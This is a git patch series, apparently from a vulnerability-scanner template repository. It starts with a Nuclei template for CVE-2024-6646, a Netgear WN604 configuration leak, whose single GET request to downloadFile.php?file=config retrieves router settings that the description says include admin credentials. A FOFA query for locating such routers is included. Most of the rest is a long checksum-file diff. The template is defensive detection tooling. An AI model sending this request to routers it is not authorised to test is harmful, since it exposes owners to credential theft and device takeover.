Disclosure + author: pussycat0x + severity: medium + description: | + There is an information leakage vulnerability in the downloadFile.php interface of Netgear WN604. A remote attacker using file authentication can use this vulnerability to obtain the administrator account and password information of the wireless router, causing the router's background to be controlled. The attacker can initiate damage to the wireless network or further threaten it. + reference: + - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md + - https://github.com/mikutool/vul/issues/1 + - https://vuldb.com/?ctiid.271052 + - https://vuldb.com/?id.271052 + - https://vuldb.com/?submit.367382 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6646 + cwe-id: CWE-200 + epss-score: 0.00045 + epss-percentile: 0.16001 + metadata: + fofa-query: title=="Netgear" + tags: cve,cve2024,netgear + +http: + - method: GET + path: + - "{{BaseURL}}/downloadFile.php?file=config" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "system:basicSettings" + - "system:staSettings" + condition: and + + - type: status + status: + - 200 From 154beab208bf518991c0fda9f02b73def83fc42d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Wed, 17 Jul 2024 19:47:24 +0530 Subject: [PATCH 1327/1841] Update CVE-2024-6646.yaml --- http/cves/2024/CVE-2024-6646.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2024/CVE-2024-6646.yaml b/http/cves/2024/CVE-2024-6646.yaml index 70ce3862ac..19fb5ad9c9 100644 --- a/http/cves/2024/CVE-2024-6646.yaml +++ b/http/cves/2024/CVE-2024-6646.yaml @@ -35,7 +35,7 @@ http: words: - "system:basicSettings" - "system:staSettings" - condition: and + condition: and - type: status status: From 0dfb54b2845e93c43fb12509f1174fb7084c52f8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 17 Jul 2024 14:27:03 +0000 Subject: [PATCH 1329/1841] Auto Generated Templates Checksum [Wed Jul 17 14:27:03 UTC 2024] :robot: --- templates-checksum.txt | 406 ++++++++++++++++++++--------------------- 1 file changed, 203 insertions(+), 203 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index dbcc5cf3ae..3292d3938b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5002,7 +5002,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671 http/exposures/configs/zend-config-file.yaml:f835fc3f4e814315144214f5bb0fe1a8cd178a71 -http/exposures/files/adcs-certificate.yaml:4eaec669c8a4fa91714bcf254c682581a83408df +http/exposures/files/adcs-certificate.yaml:8e107c896596e512bdf9b65da2ef6a985b8f822d http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:2a3d72cad226944f1ecf05789504cc811b77e5bc http/exposures/files/apdisk-disclosure.yaml:2c1e02f1fe0bf0c57cc1baf6d1fa6712b32a1856 @@ -6896,7 +6896,7 @@ http/technologies/akamai-detect.yaml:e3f8ed7c09e39c12c794d4d93846d9fa204d1c1b http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be87934dcf3ed38 http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77 http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b -http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd +http/technologies/apache/airflow-detect.yaml:bf406c07ef9dfbaaa5d600d48db3b28ae7871511 http/technologies/apache/apache-answer-detect.yaml:48deef16a566d4847d23b77e4efcbc6d58690f8f http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd http/technologies/apache/apache-cloudstack-detect.yaml:c08888a73f19a2dd082a7a928862ac07de5c7a24 @@ -7294,229 +7294,229 @@ http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddf http/technologies/wing-ftp-service-detect.yaml:02d0508b1caca874343eacbe1526d020160193cc http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8 -http/technologies/wordpress/plugins/ad-inserter.yaml:bb2b6a2cefcec61917f7c15ee96e80a750f1d703 -http/technologies/wordpress/plugins/add-to-any.yaml:09e1ee7958521db8ab328e41fc0b2e15a735e7d3 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:df8964abf44d766617dbeeba4395f6f901a1b142 +http/technologies/wordpress/plugins/ad-inserter.yaml:e067e357c472bd8ec5d358b251598f9aa35fb4be +http/technologies/wordpress/plugins/add-to-any.yaml:b69f9439b1a0a3c527a7aff84049be886f631610 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:6cc322fd7909a000e67bf6b755c2ee69ce269c78 http/technologies/wordpress/plugins/adminimize.yaml:fe9261de252e3a80da843e6bd6b356825bb37611 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:44a3c2e8c28b0a7c380fff8b194f80bc0b85209d -http/technologies/wordpress/plugins/akismet.yaml:a7c535fa20e8248b7d4b8c3dcd004f82ce282861 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:e76e42d907d888004ffeb85977b15917dbefa28d +http/technologies/wordpress/plugins/akismet.yaml:80cbce87a24f12d67c6aeaca046591d591fa20e7 http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:cd265a5fec513a57ee120b7713fc294eae0d745b -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:e2f1f49e2fdfb1a7afcdf39851e892df5445bcc1 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:4147669572a756fa71f8386e52115124747b3375 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:0e58d08bff14a5bdcf74b0071ab30493843b7897 -http/technologies/wordpress/plugins/amp.yaml:59ccd6bfaedca34352633d519865cb5daf5cb295 -http/technologies/wordpress/plugins/antispam-bee.yaml:83282137b06b9d2725b87a1cc5a252e150a7289c -http/technologies/wordpress/plugins/astra-sites.yaml:16090e25b8fe43606f16c162171f7bfca5904f3e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:9d2fa2ad57e8bd5ed29aed75ef913fb67b53749d +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:9dde6cd42c728a1ba85166e75cfb6a41ebda5036 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:967b5c493671d6431bea5ce64fa85e526d3a889e +http/technologies/wordpress/plugins/amp.yaml:3b024081d4036d1f44c787e7d76b6ad5fe6e8d77 +http/technologies/wordpress/plugins/antispam-bee.yaml:45a2231f58335862c0f28704903e02fd136de9ee +http/technologies/wordpress/plugins/astra-sites.yaml:31e0f2e1e49ce856e2525961699b54d49bbbb3f6 http/technologies/wordpress/plugins/astra-widgets.yaml:a03bab29952a3b69ee9f684a36a3ba67ff4b8d09 -http/technologies/wordpress/plugins/autoptimize.yaml:7d1bf01c79ad1ccc3f93ae7ca50dd1dc848a8a50 -http/technologies/wordpress/plugins/backwpup.yaml:37a7481e252cd63ce9470fe090c12238683edc30 -http/technologies/wordpress/plugins/better-search-replace.yaml:f5ba1713c0d0c57feff23cd61f09adff485c1719 -http/technologies/wordpress/plugins/better-wp-security.yaml:b6b6b09969408686afbd99a8f501869efd3d9da7 -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:9cde38ae78739088c0bd65304fb8d6531ef56533 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:34318fb63b04eba5f885e412e63eae18522719c2 -http/technologies/wordpress/plugins/breeze.yaml:e10adf37977d9912d3fbd5ccfd883eb279807d62 -http/technologies/wordpress/plugins/broken-link-checker.yaml:0213894e372f547ebaf10f75363f69db5f9ca1ba -http/technologies/wordpress/plugins/chaty.yaml:62cbf438b45f57052b4e03b5c0df71efdf66a6ff -http/technologies/wordpress/plugins/child-theme-configurator.yaml:5731175c0dfbe3a3df0e3a6e689be856fc69516d -http/technologies/wordpress/plugins/classic-editor.yaml:571df5057165afdd6c854028b0050a93a3a03d52 -http/technologies/wordpress/plugins/classic-widgets.yaml:0b4ade396e68a29fd134770790ea78081ab767a6 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:be13071cd6582b3cb210ad89c10fc6e0957bd131 +http/technologies/wordpress/plugins/autoptimize.yaml:011bca8d1bbfd85fdbf957e21ee4f3e9590366f5 +http/technologies/wordpress/plugins/backwpup.yaml:6727c2a8698b7a9abacf148e6023370b95738d03 +http/technologies/wordpress/plugins/better-search-replace.yaml:b213320b4c7551c9fdc20fb0ec8276bdfe73b825 +http/technologies/wordpress/plugins/better-wp-security.yaml:dbddbcb23eb0f325a44dd2c620e1e44e702a860a +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:7fc65d6bb56e0e15ee0f8ae901f89da2c3ae10f9 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:ec411ffaad447876c81d6268b20edeeb52fabd90 +http/technologies/wordpress/plugins/breeze.yaml:08e5903ee95ee4e37b7cd68e29a1332ae5f72b0e +http/technologies/wordpress/plugins/broken-link-checker.yaml:a949d9f0572f79d9d2d319679944cb2ad786042d +http/technologies/wordpress/plugins/chaty.yaml:542e90f1b7fece08e36a22b0b461da5b2cd7274e +http/technologies/wordpress/plugins/child-theme-configurator.yaml:622776761bcba08eb7ead68230a6c9763d764402 +http/technologies/wordpress/plugins/classic-editor.yaml:4f42421e13c28213aa4a8008fc81fe44f40ba8ce +http/technologies/wordpress/plugins/classic-widgets.yaml:795af82f32035f99feffea5a95aba3f844f0daf2 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:27fc0c8be3979dd1f7b7047d5bf91af338247ef9 http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:b1e8cafb11ee15d77391e1a02392af8cccba57f8 -http/technologies/wordpress/plugins/coblocks.yaml:a34822c69420495a9273affddf9194537282a30d -http/technologies/wordpress/plugins/code-snippets.yaml:678b681cd40897764ec166dea99de8478181954c -http/technologies/wordpress/plugins/coming-soon.yaml:0f3ded7600e1fa0bd83eb57744dfd945ba58dd73 -http/technologies/wordpress/plugins/complianz-gdpr.yaml:74b77fc63e2878a7d4f92f3a4b7f55c7e968ef6b -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:b7d102f65a73bdd3b009e0a7ad81e447d3eaa88d -http/technologies/wordpress/plugins/contact-form-7.yaml:140ba02fcbd12efc5d09525f322fb443d6b2ad57 -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:ab0ad7bfdd3ea91630c85b581daab66df5554c48 -http/technologies/wordpress/plugins/cookie-law-info.yaml:a7af47d278ad5eb7224c350eb2246c432e3288d3 -http/technologies/wordpress/plugins/cookie-notice.yaml:de50919a6a468a9878240d88e8ddf4f9d52fb176 -http/technologies/wordpress/plugins/copy-delete-posts.yaml:0e850184e814cce643bbf4ad50036499a316ef5b -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:5d6aa81f5fd085008d3137a640ae215211b4c0c2 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:096ba6d050e5a6419cff50741d7f3e5907d9bf75 -http/technologies/wordpress/plugins/custom-css-js.yaml:4459e4d2fcf25c6b65ccf035c24fa8777c48f08c -http/technologies/wordpress/plugins/custom-fonts.yaml:08c475c2849a90c08b82b758cfe5b9aee0cd711d -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:edc7a821b6fe5b015138a01d2ebc3e6513f491f9 -http/technologies/wordpress/plugins/disable-comments.yaml:8c1ccb3aa597c3bf0c16e84bf79a6f136b13fe3c -http/technologies/wordpress/plugins/disable-gutenberg.yaml:c5f1d33397f74e2566cccfe9adf4149eb14b4a11 -http/technologies/wordpress/plugins/duplicate-page.yaml:6f972f4970eef86897f9b7aff1c0c74f6edf5f41 -http/technologies/wordpress/plugins/duplicate-post.yaml:c8b511a66ff43a45ffedd1b88a46d40e53a8005e -http/technologies/wordpress/plugins/duplicator.yaml:f6e89d5511f41ab8fead85b58a61d82176319d44 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:13b2156be104efcc96069f119cdc2c858b5aed3a +http/technologies/wordpress/plugins/cmb2.yaml:ec1cc6201cc78a92a9c66aee4159cf1cd72ef488 +http/technologies/wordpress/plugins/coblocks.yaml:7d10ea3193d3dee8324a98e9728c2e25c65a5494 +http/technologies/wordpress/plugins/code-snippets.yaml:ce7943cb86341eaee00d53f475b1f942a42d4b87 +http/technologies/wordpress/plugins/coming-soon.yaml:3ce0c1bb23832957e8e8f964d3ad6e5950151852 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:ea250332ccbbac354434e1efd95f9f147731c136 +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:758acb18b74f907e7ee56754755abc04a18ff30c +http/technologies/wordpress/plugins/contact-form-7.yaml:b07e236f34aa44ba7810ae602950680de4a304db +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:80e3cb76543739cdce870383697aff07bb96cd44 +http/technologies/wordpress/plugins/cookie-law-info.yaml:0abbfc009a114b0a626c7a7bce97ed2247a69621 +http/technologies/wordpress/plugins/cookie-notice.yaml:7c6746459b03670d1751039775012aeeb0ed308b +http/technologies/wordpress/plugins/copy-delete-posts.yaml:5b97e6c996389e29e1b918e92f64b32394e17758 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:2e88a6149051bbf0e451fe03c7bf0346d8a50cf6 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:d3c500c590201da0a6c6a7723a5aed5418562151 +http/technologies/wordpress/plugins/custom-css-js.yaml:f7b1e1d2bb01b68bc6bc408e04c17fbc89bf4c5f +http/technologies/wordpress/plugins/custom-fonts.yaml:1791fdc0db0656191cbd0e1ff8c4475852846853 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:55a82b971d2a705ad3701f4a05064416646d612d +http/technologies/wordpress/plugins/disable-comments.yaml:8aee5e367999ad05f8d5ab0cfa242524c9a0b097 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:bbf25077af86b9d381004debbdd18d5548a66c67 +http/technologies/wordpress/plugins/duplicate-page.yaml:5c5113abe34fa40a6f21cfbd25539cf6ecb028e8 +http/technologies/wordpress/plugins/duplicate-post.yaml:3267eb33a319548414cc2550aa3a7945e63adae4 +http/technologies/wordpress/plugins/duplicator.yaml:2b4a61b86286eb244ce3fb77a3fb6de8d430f3e0 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:090d0d5a3b11c991cbefb7429d6b2b2a46cbeb60 http/technologies/wordpress/plugins/easy-fancybox.yaml:91706438bedc39afdeaebdbf43a683bb583c8ec0 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:dc7f8a66d655b230b9f86e7408371b657afec872 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:7a3c617033da4dea65448ac98079dca7ce9eced7 -http/technologies/wordpress/plugins/elementor.yaml:87e57bed454c1ffa8f1180c092768b884c01fe55 -http/technologies/wordpress/plugins/elementskit-lite.yaml:fd765eb94f1951124b42f0060fdbaf3e41f64f94 -http/technologies/wordpress/plugins/enable-media-replace.yaml:ab31d8de8202f5fe56342e37e2b97b620c04a18d -http/technologies/wordpress/plugins/envato-elements.yaml:1792b1bb18d8e3b75290c49e9481abd752625f7f -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:e955c0301c4d36e1ed0058ca20df5e90550ff64a -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:b0b23c965232eedb1605f21ed92cd3647f6f18d4 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:0d6fa673ecc67045a97cd1b27b6de09368e069bc -http/technologies/wordpress/plugins/fast-indexing-api.yaml:89229b48edbf5b17553d55e6b39521ac3c61abcb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:05492b67a15c0842ad5d7f263974671b9c461f84 -http/technologies/wordpress/plugins/flamingo.yaml:bbad18399f4057fce68a1019cfb0c177f3f66ad4 -http/technologies/wordpress/plugins/fluentform.yaml:41bab87a01e0ce62341a024bd937104f1072b395 -http/technologies/wordpress/plugins/font-awesome.yaml:d61908d165c5e27d05672655e2a21614d82c7df7 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:18bdbf5f4ab294b177f0bb0fe1591208b00ba16e -http/technologies/wordpress/plugins/formidable.yaml:fc76ea970f27659d0479ccde36ffea594b78ece7 -http/technologies/wordpress/plugins/forminator.yaml:0d0c8abfd5d9b766e1d1f9ea24639096df336219 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:06ed726b8d2b53d84fb0a0b1a5e7bee8ce776739 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:eabba7c66e27662066cddd955ed9548285a0a19b -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:b80b8b453286fb2052562066564133d1df4d4522 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:52e327176ffa0934107760389a7fa6c15d6cd736 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:98982c9edf9970367b127390e0c459c8b542e7fa -http/technologies/wordpress/plugins/google-site-kit.yaml:61300b4bd7867c298807e347709d0f2084201aa6 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:38b0d8740502247c857db2223f0d1a3bf68881b1 -http/technologies/wordpress/plugins/gtranslate.yaml:f2c1f59a6c40d7979e51aa224166e4fdae6d61d6 -http/technologies/wordpress/plugins/gutenberg.yaml:b87560081e190486ebe86901eabd5efecc742a51 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:7403aa1e1055a924ed8a53be33eb00c623f83442 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:63c2989eeac211b0dc91a2da72a09bfa26f032b3 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:9aaadbc157a942a10440785cbd6d8aa80bc25e39 +http/technologies/wordpress/plugins/elementor.yaml:2e4d10b4ff08d6ea5964f3ac1a8195c9744d9591 +http/technologies/wordpress/plugins/elementskit-lite.yaml:cca1c074b864f3d5c94937bd43e828c774e0c97d +http/technologies/wordpress/plugins/enable-media-replace.yaml:5fdb5d89bec6fd068934a30f0b8b1cee8c8f163a +http/technologies/wordpress/plugins/envato-elements.yaml:985f74fa1b59669fa595f9f5663e3738cbb1ae3a +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:9775303cf422471ea46f4a569a569a7fcfff6e38 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:7faabc428c83601a48b6b45196338f773cdb68fe +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:e4bfa703f615c586bf15b3ab637e6016191363f4 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:513731fe4aabb54658fd146b2534217bcb256108 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:8f27707106dfb61ed0c73d7ac4393fcaa010605e +http/technologies/wordpress/plugins/flamingo.yaml:4499ebd1420050bc4d86aebe99c083028ce3bc28 +http/technologies/wordpress/plugins/fluentform.yaml:53952e72dc35c8feb9f8739808894ed882fb019c +http/technologies/wordpress/plugins/font-awesome.yaml:63b6d44b534c9fd8dee1ea81ffd716c987bc2b6e +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:0b3a0d27e272c6950deff5f49e17c6814f987712 +http/technologies/wordpress/plugins/formidable.yaml:f06b9f12a7850db57e5f57dda4296811c299925c +http/technologies/wordpress/plugins/forminator.yaml:facf0e8bbc796322a08c63bf938c26ca10246efe +http/technologies/wordpress/plugins/ga-google-analytics.yaml:83978ec2f91546a6663a4c88c15179f3372a583b +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:3589c93816f9e05d3cfca2408e656406fc4062b0 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:d2a19ad3879e176c08dc68a02d7e26d6392b69b7 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:7ac55fe9ac13afb9ecff205149a061941b22576f +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4f7d3120e2bfe5555155b8e78031b84cc37040e7 +http/technologies/wordpress/plugins/google-site-kit.yaml:439dd6de9510c909a8c102c353329bc8f863c585 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:b26c751299867caba9d4aae857a11c25799f6520 +http/technologies/wordpress/plugins/gtranslate.yaml:8fd011f2396b29323896f16754aa504b1f036d02 +http/technologies/wordpress/plugins/gutenberg.yaml:a32a81de0d8a8abc1646c4dc48dd3d6656aa09c7 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:e9e741f7d54c6d3f48e7d272e3b4b0493034a582 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:73cef6de60def66b42aebcdc50021330113124c2 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:91f4c5a51b2b2cabf98932be7bceb56cffd196b6 +http/technologies/wordpress/plugins/header-footer.yaml:75e75d72e59f586249e99dbeb2a7b3899bbf9be9 +http/technologies/wordpress/plugins/health-check.yaml:3c2200b1aa0483543519be6ecbd0e1b1072a672a +http/technologies/wordpress/plugins/hello-dolly.yaml:6a9a2d558d6232fcfdee2745738226ea146c840f +http/technologies/wordpress/plugins/host-webfonts-local.yaml:8dc283cfe802277ece271f0b142d3eeb5c2466b6 +http/technologies/wordpress/plugins/hostinger.yaml:0c5bb65651142a15cb88dd192d52cd8bf3ced63c +http/technologies/wordpress/plugins/image-optimization.yaml:3ab3391345ecd3c57560839dd7aa453f91d614d0 +http/technologies/wordpress/plugins/imagify.yaml:8a5fc3096f4a8ecf0b8ee1eed59a2f91acdb38c8 +http/technologies/wordpress/plugins/imsanity.yaml:36c4a5dadefa9f97c6a3579fba41e1db148156bc +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:27558fa16920eeff4156998e6a743831ea26cbd6 +http/technologies/wordpress/plugins/instagram-feed.yaml:65e134aee3e82e8c36091b70f388bf9854aef1a0 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f49fe8fb33db7685b662c46c78ef6658d7092ea http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:0063727e2c7ac5322fc551cd700671f917c60304 +http/technologies/wordpress/plugins/jetpack.yaml:bb140f10c1592047a3b8ec5a2a567d6576e2006e +http/technologies/wordpress/plugins/kadence-blocks.yaml:2c5f54e4bd0aecaff7e467e41e6d4c8176a2956e +http/technologies/wordpress/plugins/kirki.yaml:fbe3fc3cdf00a13efabddc058b14d2891bda2d10 +http/technologies/wordpress/plugins/leadin.yaml:dc4b649805d1aaa5970750a50c0947bc93213063 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:111340df8784d87e08b167a86660e38ef533929f +http/technologies/wordpress/plugins/limit-login-attempts.yaml:69686d96fbd74122fe5051c337fd20ee19e21d30 +http/technologies/wordpress/plugins/litespeed-cache.yaml:27102347051d8a76190798320f3c5a8db6d974e7 +http/technologies/wordpress/plugins/loco-translate.yaml:d001ca1c5c7b9cd438bfb6c689c8c7d5a03ba49f +http/technologies/wordpress/plugins/loginizer.yaml:71c3c9002d23043b66f0ea9ebd1966113b67b97c http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:b1a2ac64ed191ad08002b7df29594e179c4da4bd +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:6f80ee60970fac6a5d3637ca02deac9ad6196fe2 +http/technologies/wordpress/plugins/mailpoet.yaml:892e52925c65450f3956d6a94cfc4ad8cad28d0b +http/technologies/wordpress/plugins/maintenance.yaml:7266d7246980628ac6a691674f1863a9a09f685a +http/technologies/wordpress/plugins/mainwp-child.yaml:084749769643249871a4dea287bfc1181e611e9a +http/technologies/wordpress/plugins/malcare-security.yaml:eb45bf9ddea2c84153eb42ea5056516470eae0b6 